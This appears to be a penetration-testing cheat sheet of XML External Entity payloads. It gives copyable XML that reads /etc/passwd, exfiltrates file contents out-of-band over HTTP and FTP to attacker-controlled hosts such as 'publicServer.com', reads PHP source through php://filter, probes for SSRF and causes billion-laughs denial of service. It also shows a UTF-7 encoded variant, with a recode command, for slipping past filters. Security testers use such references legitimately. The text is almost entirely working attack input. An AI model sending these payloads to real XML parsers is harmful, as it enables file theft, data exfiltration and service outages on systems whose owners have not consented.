XML External Entitiy (XXE)
LFI Test
1
<?xml version="1.0"?>
2
<!DOCTYPE foo [
3
<!ELEMENT foo (#ANY)>
4
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
Copied!
Blind LFI test (when first case doesn't return anything)
1
<?xml version="1.0"?>
2
<!DOCTYPE foo [
3
<!ELEMENT foo (#ANY)>
4
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
5
<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>
Copied!
Access Control bypass (loading restricted resources - PHP example)
1
<?xml version="1.0"?>
2
<!DOCTYPE foo [
3
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
4
<foo><result>&ac;</result></foo>
Copied!
SSRF Test
1
<?xml version="1.0"?>
2
<!DOCTYPE foo [
3
<!ELEMENT foo (#ANY)>
4
<!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo>
Copied!
XEE (XML Entity Expansion - DOS)
1
<?xml version="1.0"?>
2
<!DOCTYPE lolz [
3
<!ENTITY lol "lol">
4
<!ELEMENT lolz (#PCDATA)>
5
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
6
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
7
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
8
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
9
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
10
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
11
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
12
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
13
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
14
]>
15
<lolz>&lol9;</lolz>
Copied!
XEE #2 (Remote attack - through external xml inclusion)
1
<?xml version="1.0"?>
2
<!DOCTYPE lolz [
3
<!ENTITY test SYSTEM "https://example.com/entity1.xml">]>
4
<lolz><lol>3..2..1...&test<lol></lolz>
Copied!
XXE FTP HTTP Server
1
<!DOCTYPE data [
2
<!ENTITY % remote SYSTEM "http://publicServer.com/parameterEntity_sendftp.dtd">
3
%remote;
4
%send;
5
]>
6
<data>4</data>
7
8
File stored on http://publicServer.com/parameterEntity_sendftp.dtd
9
10
<!ENTITY % param1 "<!ENTITY &#37; send SYSTEM 'ftp://publicServer.com/%payload;'>">
11
%param1;
Copied!
XXE UTF-7
1
<?xml version="1.0" encoding="UTF-7"?>
2
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
3
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
4
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
Copied!
To convert between UTF-8 & UTF-7 use recode. recode UTF8..UTF7 payload-file.xml
Last modified 2yr ago
Copy link